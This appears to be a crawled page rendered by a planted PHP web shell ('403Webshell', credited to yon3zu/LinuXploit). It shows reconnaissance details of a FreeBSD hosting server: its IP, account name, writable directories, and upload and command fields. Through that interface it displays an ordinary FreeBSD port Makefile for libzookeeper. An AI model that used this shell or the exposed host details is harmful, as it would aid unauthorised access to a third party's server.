403Webshell
Server IP : 82.208.35.60  /  Your IP : 216.73.216.89
Web Server : Apache/2.4.55 (FreeBSD) OpenSSL/1.1.1q-freebsd PHP/7.3.31
System : FreeBSD server7.d2m.cz 12.4-RELEASE-p9 FreeBSD 12.4-RELEASE-p9 GENERIC amd64
User : studiokobylisy_cz ( 1008)
PHP Version : 7.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /usr/ports/devel/libzookeeper/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/ports/devel/libzookeeper/Makefile
PORTNAME=	zookeeper
PORTVERSION=	3.8.0
CATEGORIES=	devel
MASTER_SITES=	APACHE/${PORTNAME}/${PORTNAME}-${PORTVERSION}
PKGNAMEPREFIX=	lib
DISTNAME=	apache-${PORTNAME}-${PORTVERSION}

MAINTAINER=	dmitry.wagin@ya.ru
COMMENT=	C client interface to Zookeeper server
WWW=		https://zookeeper.apache.org/

LICENSE=	APACHE20
LICENSE_FILE=	${WRKSRC}/LICENSE

LIB_DEPENDS=	libcppunit.so:devel/cppunit

USES=		autoreconf cpe libtool pkgconfig
CPE_VENDOR=	apache
USE_LDCONFIG=	yes

GNU_CONFIGURE=	yes

WRKSRC=		${WRKDIR}/${DISTNAME}/zookeeper-client/zookeeper-client-c

post-extract:
	@${MKDIR} ${WRKSRC}/generated/
	@cd ${FILESDIR} && ${CP} -p zookeeper.jute.* ${WRKSRC}/generated/

post-install:
	@${STRIP_CMD} ${STAGEDIR}${PREFIX}/bin/* ${STAGEDIR}${PREFIX}/lib/*.so
	${LN} -sf libzookeeper_mt.so.2 ${STAGEDIR}${PREFIX}/lib/libzookeeper_mt.so
	${LN} -sf libzookeeper_st.so.2 ${STAGEDIR}${PREFIX}/lib/libzookeeper_st.so

.include <bsd.port.mk>

Youez - 2016 - github.com/yon3zu
LinuXploit